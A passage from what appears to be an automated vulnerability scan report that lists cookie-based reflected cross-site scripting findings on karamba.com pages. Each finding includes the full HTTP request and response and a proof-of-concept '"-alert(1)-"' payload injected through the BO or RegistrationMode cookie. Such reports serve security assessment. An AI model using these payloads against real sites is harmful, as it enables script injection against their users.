<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM95c72"-alert(1)-"49ec3582046";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.266. http://www.karamba.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39bc5"-alert(1)-"237d966b40f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM39bc5"-alert(1)-"237d966b40f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM39bc5"-alert(1)-"237d966b40f; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM39bc5"-alert(1)-"237d966b40f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.267. http://www.karamba.com/Help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f0ee"-alert(1)-"7c2a7c12ad4 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM1f0ee"-alert(1)-"7c2a7c12ad4; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: BO=FM1f0ee"-alert(1)-"7c2a7c12ad4; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM1f0ee"-alert(1)-"7c2a7c12ad4";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.268. http://www.karamba.com/Help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8630"-alert(1)-"42d13196f0f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMa8630"-alert(1)-"42d13196f0f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa8630"-alert(1)-"42d13196f0f; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa8630"-alert(1)-"42d13196f0f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.269. http://www.karamba.com/Home.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af96d"-alert(1)-"fc26d1b89e1 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMaf96d"-alert(1)-"fc26d1b89e1; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: BO=FMaf96d"-alert(1)-"fc26d1b89e1; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:55 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMaf96d"-alert(1)-"fc26d1b89e1";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.270. http://www.karamba.com/Home.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78021"-alert(1)-"d15b70c550f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM78021"-alert(1)-"d15b70c550f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM78021"-alert(1)-"d15b70c550f; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:43 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM78021"-alert(1)-"d15b70c550f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.271. http://www.karamba.com/InviteFriend.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c76c1"-alert(1)-"a0f60060d98 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMc76c1"-alert(1)-"a0f60060d98; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: BO=FMc76c1"-alert(1)-"a0f60060d98; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:56 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc76c1"-alert(1)-"a0f60060d98";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.272. http://www.karamba.com/InviteFriend.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3610"-alert(1)-"d93ef14478c was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMf3610"-alert(1)-"d93ef14478c; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMf3610"-alert(1)-"d93ef14478c; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:42 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMf3610"-alert(1)-"d93ef14478c";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.273. http://www.karamba.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23b45"-alert(1)-"58757223142 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM23b45"-alert(1)-"58757223142; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: BO=FM23b45"-alert(1)-"58757223142; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:57 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM23b45"-alert(1)-"58757223142";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.274. http://www.karamba.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90883"-alert(1)-"cda8db6b7b4 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM90883"-alert(1)-"cda8db6b7b4; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM90883"-alert(1)-"cda8db6b7b4; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:44 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM90883"-alert(1)-"cda8db6b7b4";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.275. http://www.karamba.com/Privacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Privacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a755d"-alert(1)-"208f7a4e8b9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMa755d"-alert(1)-"208f7a4e8b9; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: BO=FMa755d"-alert(1)-"208f7a4e8b9; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa755d"-alert(1)-"208f7a4e8b9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
